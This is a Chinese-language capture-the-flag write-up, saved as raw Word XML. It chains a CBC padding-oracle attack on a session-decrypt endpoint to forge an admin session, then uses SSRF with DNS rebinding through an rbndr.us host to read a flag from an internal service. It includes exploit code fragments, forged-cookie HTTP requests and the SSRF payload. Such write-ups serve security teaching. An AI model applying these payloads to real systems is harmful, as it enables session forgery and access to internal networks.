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一、信息收集</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">浏览目标站点的默认首页，我们会捕捉到一些显眼的端点信息：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API surfaces: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/graphql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/api/profile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review filter parsing before public release --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进一步查阅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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件的内容：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Disallow: /api/session/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Disallow: /api/users/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Disallow: /api/webhook/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Disallow: /graphql</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"># graphql introspection disabled per security review (PROD-2024-Q3)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">综合上述线索，我们可以梳理出以下几个高价值的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">路径：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/graphql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/api/session/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/api/users/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/api/webhook/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/api/profile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">但真正能够串联起整个攻击流程的，实际上只有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/api/session/decrypt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/api/profile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/api/webhook/test</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这三个核心接口。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="9"/>
    <w:bookmarkStart w:id="12" w:name="header-n20"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">二、确认</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Padding Oracle</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="10" w:name="header-n21"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">观察</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/api/session/decrypt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">尝试向此路由提交任意编造的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据，可以观察到服务器给出的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">状态码具有差异性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">比方说，当我们提交一个格式完全错误的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">时：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /api/session/decrypt HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Host: 39.105.213.28:12605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{"token":"AA"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">响应如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP/1.1 400 BAD REQUEST</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{"error":"padding"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">该现象表明，后端逻辑是在执行完</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CBC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">解密操作后，再去校验</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PKCS#7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">填充格式的合法性。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="10"/>
    <w:bookmarkStart w:id="11" w:name="header-n28"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为什么这就是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Oracle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">一旦某个服务端接口能够将“填充合法”与“填充无效”的情形通过不同的响应反馈给客户端，那么这就构成了一个典型的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Padding Oracle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞场景。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">需要特别注意的是，针对本题，我们判断填充是否成功的依据并非是“状态码为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">200”，具体规则如下：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400 {"error":"padding"}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：代表填充格式遭到破坏。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422 {"error":"decode"}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或是其它不等于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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的状态码：意味着填充格式校验通过，仅仅是解密后的明文数据无法按照预期格式（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">JSON）进行解析。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这是一个极易被忽视的细节。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在动手测试阶段，当我们对特定的密文块末尾字节进行盲猜时，在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 256 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">种可能性中，仅会命中唯一一次非</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">400</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（通常为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">422</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）的响应。这个独特的反馈便是指引我们实施</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Oracle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击的“明灯”。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="11"/>
    <w:bookmarkEnd w:id="12"/>
    <w:bookmarkStart w:id="15" w:name="header-n37"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">三、利用原理</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="13" w:name="header-n38"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. CBC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">解密公式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">假设我们将密文序列划分为如下的若干区块：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">C0 | C1 | C2 | ... | Cn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CBC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模式的特性，第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块的明文还原过程遵循以下等式：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Pi = D(Ci) xor C(i-1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">倘若我们借助</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Padding Oracle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">手段，推算出了目标区块在底层运算过程中的中间态数值：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Ii = D(Ci)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">我们便能够顺势推导出应当如何伪造它的前置区块：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">C(i-1) = Ii xor Pi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这也就意味着，只要获取了特定密文块对应的中间状态，我们就拥有了掌控解密结果的权力，使其变成我们期望的任意明文片段。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="13"/>
    <w:bookmarkStart w:id="14" w:name="header-n48"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这题的构造方式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本题中，我们需要伪造出来的会话内容为：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"oracle"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我们需要对这串数据实施</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PKCS#7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规范的填充，并以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 16 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个字节为单位将其切割成不同的块。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">随后，我们将执行标准的“由尾至头反向推演”策略：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任意构造末尾的密文分块</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Cn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依靠</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Oracle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">机制测算出对应的中间值</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">In = D(Cn)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计算出倒数第二个密文块的值：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">C(n-1) = In xor Pn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将刚刚算出的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">C(n-1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">视作新的分析对象，继续测算其对应的中间值</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">I(n-1)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进一步推算更前一个密文块：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">C(n-2) = I(n-1) xor P(n-1)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循环执行此逻辑，直至首个分组。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将这些计算得出的密文块按顺序拼接在一起，即可收获一枚能够被服务端完美识别并解析为我们预设</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JSON </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据的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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">凭证。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="14"/>
    <w:bookmarkEnd w:id="15"/>
    <w:bookmarkStart w:id="16" w:name="header-n67"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">四、伪造管理员会话</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在利用代码中，承担主要工作的是以下两个函数：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oracle()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：负责向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/api/session/decrypt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">发起请求，通过识别响应是否为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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">错误来鉴别</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> padding </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的正确性。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recover_intermediate()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：以字节为单位，逐步推导并还原目标密文块的中间值</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">D(Ci)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核心的代码逻辑片段展示如下：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guess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forged[j]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dec[j]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pad</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        forged[idx]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(forged)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target_block):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dec[idx]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guess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rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这段逻辑的运作思路十分清晰：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优先对区块最末端的字节进行穷举测试。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若某次枚举恰好使得服务端的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> padding </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">校验通过，便成功解出了当前目标字节背后的中间态数据。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按照此步骤循环</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 16 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">轮，即可完全掌握整个数据块的中间值。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">紧接着配合如下代码：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cipher_blocks[idx]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xor_bytes(dec, blocks[idx])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">便可顺利根据我们所期望的明文数据，逆向演算出前序密文块应有的值。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="16"/>
    <w:bookmarkStart w:id="17" w:name="header-n87"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">五、拿到管理员内部资料</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在成功制作出合法的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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">之后，我们就可以直接向用户信息接口发起请求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /api/profile HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Host: 39.105.213.28:12605</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie: session=&lt;forged_admin_session&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在我的实际测试中，服务端回显了如下结果：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"oracle@oracle.local"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"http://internal-api:6000/cache/template"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"0ce471fa7d5f430dcfd6318ce20e3558"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"session_clue"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 are AES-CBC with a server-fixed IV."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上述返回结果中，最具价值的字段莫过于：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internal_token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internal_endpoint</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">获取到这些数据，意味着触发最终</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞的必要条件已经全部具备。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="17"/>
    <w:bookmarkStart w:id="18" w:name="header-n99"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">六、SSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + DNS Rebinding </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">读取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作为终极一击，我们调用以下接口：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /api/webhook/test HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Host: 39.105.213.28:12605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Cookie: session=&lt;forged_admin_session&gt;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"url": "http://7f000001.01010101.rbndr.us:6000/cache/template?name=/flag",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  "method": "GET",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  "headers": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    "X-Internal-Token": "&lt;internal_token&gt;"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此处的攻击技巧在于：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表面上，我们指示服务器去抓取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">rbndr.us</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这个外部域名的内容。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但实质上，我们利用了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">重新绑定（DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Rebinding）机制，促使目标机器在真正发起连接时将其解析到本地回环地址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借此手法，我们得以突破网络隔离，访问到其内部的服务端口及路径</w:t>
      </w:r>
      <w:r>
